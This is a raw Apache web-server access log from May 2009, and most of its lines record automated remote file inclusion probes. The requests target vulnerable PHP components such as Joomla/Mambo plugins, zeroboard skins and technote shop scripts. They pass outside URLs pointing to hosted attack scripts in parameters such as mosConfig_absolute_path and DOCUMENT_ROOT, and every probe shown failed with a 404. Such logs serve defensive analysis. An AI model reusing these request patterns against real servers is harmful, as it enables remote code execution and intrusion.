208.64.202.135 - - [12/May/2009:20:01:58 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:01:58 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:02:04 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:02:04 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:02:04 -0500] "GET //config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:02:05 -0500] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:02:09 -0500] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:08:06 -0500] "GET /logs/access_log.1239062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.117.188.207 - - [12/May/2009:20:10:01 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 200 176677 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.117.188.207 - - [12/May/2009:20:10:02 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 200 229376 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
211.110.19.24 - - [12/May/2009:20:10:40 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.110.19.24 - - [12/May/2009:20:10:40 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.110.19.24 - - [12/May/2009:20:10:40 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.110.19.24 - - [12/May/2009:20:11:02 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.219.97.207 - - [12/May/2009:20:18:24 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
66.219.97.207 - - [12/May/2009:20:18:29 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
122.153.212.195 - - [12/May/2009:20:19:13 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:19:13 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:19:13 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:19:21 -0500] "GET /logs/access_log.1238803200/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:22:17 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:23:07 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:23:07 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:24:56 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:24:57 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.219.97.207 - - [12/May/2009:20:27:57 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
66.219.97.207 - - [12/May/2009:20:27:57 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
122.153.212.195 - - [12/May/2009:20:31:11 -0500] "GET //config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:31:14 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:31:16 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:31:20 -0500] "GET /logs/access_log.1233619200//config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:20:35:47 -0500] "GET /logs/access_log.1240185600//admin.cropcanvas.php?cropimagedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:20:35:48 -0500] "GET //admin.cropcanvas.php?cropimagedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:20:35:48 -0500] "GET /logs//admin.cropcanvas.php?cropimagedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.246.55.235 - - [12/May/2009:20:35:53 -0500] "GET /logs/access_log.1239235200//admin.cropcanvas.php?cropimagedir=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
94.102.51.196 - - [12/May/2009:20:46:29 -0500] "GET /logs/access_log.1232064000 HTTP/1.0" 200 120936 "http://fortpit.pconline.com/logs/access_log.1232064000""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
211.110.19.178 - - [12/May/2009:20:50:30 -0500] "GET ///skin/zero_vote/ask_password.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.110.19.178 - - [12/May/2009:20:50:30 -0500] "GET /logs///skin/zero_vote/ask_password.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.110.19.178 - - [12/May/2009:20:50:30 -0500] "GET /logs/access_log.1231718400///skin/zero_vote/ask_password.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.110.19.178 - - [12/May/2009:20:50:32 -0500] "GET /logs/access_log.1236643200///skin/zero_vote/ask_password.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:50:41 -0500] "GET /logs///skin/zero_vote/setup.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:50:41 -0500] "GET /logs/access_log.1234828800///skin/zero_vote/setup.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:50:41 -0500] "GET ///skin/zero_vote/setup.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:50:41 -0500] "GET /logs/access_log.1235260800///skin/zero_vote/setup.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
84.32.195.2 - - [12/May/2009:20:51:25 -0500] "GET /logs/file_upload.php?sbp=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.32.195.2 - - [12/May/2009:20:51:25 -0500] "GET /file_upload.php?sbp=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.32.195.2 - - [12/May/2009:20:51:25 -0500] "GET /logs/access_log.1239235200/file_upload.php?sbp=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [12/May/2009:20:51:25 -0500] "GET /logs/access_log.1238284800/file_upload.php?sbp=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
123.215.198.132 - - [12/May/2009:20:55:18 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://search.msn.co.uk/results.aspx?srch=105&FORM=AS5&q=ok""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; StumbleUpon.com 1.814; Alexa Toolbar)"
66.249.67.180 - - [12/May/2009:20:56:02 -0500] "GET /logs/access_log.1171929600 HTTP/1.1" 200 24451 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.110.19.178 - - [12/May/2009:20:56:07 -0500] "GET ///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.110.19.178 - - [12/May/2009:20:56:07 -0500] "GET /logs/access_log.1230595200///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.110.19.178 - - [12/May/2009:20:56:07 -0500] "GET /logs///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:56:23 -0500] "GET /logs/access_log.1232841600///skin/zero_vote/login.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:56:23 -0500] "GET /logs///skin/zero_vote/login.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:56:23 -0500] "GET /logs/access_log.1231027200///skin/zero_vote/login.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.239.76.25 - - [12/May/2009:20:56:23 -0500] "GET ///skin/zero_vote/login.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.228.155.80 - - [12/May/2009:20:59:16 -0500] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
195.228.155.80 - - [12/May/2009:20:59:17 -0500] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
222.239.76.25 - - [12/May/2009:21:09:44 -0500] "GET /logs/access_log.1240531200///skin/zero_vote/setup.php?dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.173.130.41 - - [12/May/2009:21:10:41 -0500] "GET /server.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.173.130.41 - - [12/May/2009:21:10:41 -0500] "GET /logs/server.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.173.130.41 - - [12/May/2009:21:10:41 -0500] "GET /logs/access_log.1239926400/server.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:17:02 -0500] "GET /logs/access_log.1236729600//uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:17:02 -0500] "GET /logs//uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:17:02 -0500] "GET //uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:17:02 -0500] "GET /logs/access_log.1236902400//uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.172.126.16 - - [12/May/2009:21:17:39 -0500] "GET /logs/avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:21:17:39 -0500] "GET /avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
203.114.112.155 - - [12/May/2009:21:19:06 -0500] "GET /logs/access_log.1235952000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
203.114.112.155 - - [12/May/2009:21:19:06 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
203.114.112.155 - - [12/May/2009:21:19:07 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.106.135.14 - - [12/May/2009:21:19:17 -0500] "GET /logs/avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.135.14 - - [12/May/2009:21:19:18 -0500] "GET /avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.114.112.155 - - [12/May/2009:21:19:29 -0500] "GET /logs/access_log.1235779200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
217.18.76.16 - - [12/May/2009:21:19:35 -0500] "GET /logs/avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:21:19:35 -0500] "GET /avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.103.144 - - [12/May/2009:21:19:49 -0500] "GET /logs/avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:21:19:50 -0500] "GET /avatar.php?page=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
88.84.128.40 - - [12/May/2009:21:22:12 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:21:22:13 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
218.185.20.88 - - [12/May/2009:21:22:22 -0500] "GET /logs//uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:22:22 -0500] "GET //uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:22:22 -0500] "GET /logs/access_log.1236902400//uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:21:22:22 -0500] "GET /logs/access_log.1236729600//uslugi/pr//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:21:25:09 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:21:25:12 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:21:25:14 -0500] "GET /logs/access_log.1239321600/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:21:25:21 -0500] "GET /logs/access_log.1236643200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
88.84.128.40 - - [12/May/2009:21:26:57 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:21:26:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
67.202.81.179 - - [12/May/2009:21:27:38 -0500] "GET /logs/access_log.1233705600/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://backwordz.com/images/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.202.81.179 - - [12/May/2009:21:27:39 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://backwordz.com/images/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.202.81.179 - - [12/May/2009:21:27:39 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://backwordz.com/images/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.202.81.179 - - [12/May/2009:21:27:45 -0500] "GET /logs/access_log.1235001600/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://backwordz.com/images/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.176.196.171 - - [12/May/2009:21:27:45 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
216.176.196.171 - - [12/May/2009:21:27:46 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
77.221.130.2 - - [12/May/2009:21:29:56 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:21:29:56 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:21:29:56 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.2 - - [12/May/2009:21:29:56 -0500] "GET /logs/access_log.1236470400//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs/access_log.1233705600//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs/access_log.1233705600//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:24 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:35 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:36 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:36 -0500] "GET /logs/access_log.1236470400//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:36 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
202.89.33.167 - - [12/May/2009:21:30:44 -0500] "GET /logs/access_log.1236470400//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
91.195.124.10 - - [12/May/2009:21:32:39 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.195.124.10 - - [12/May/2009:21:32:39 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
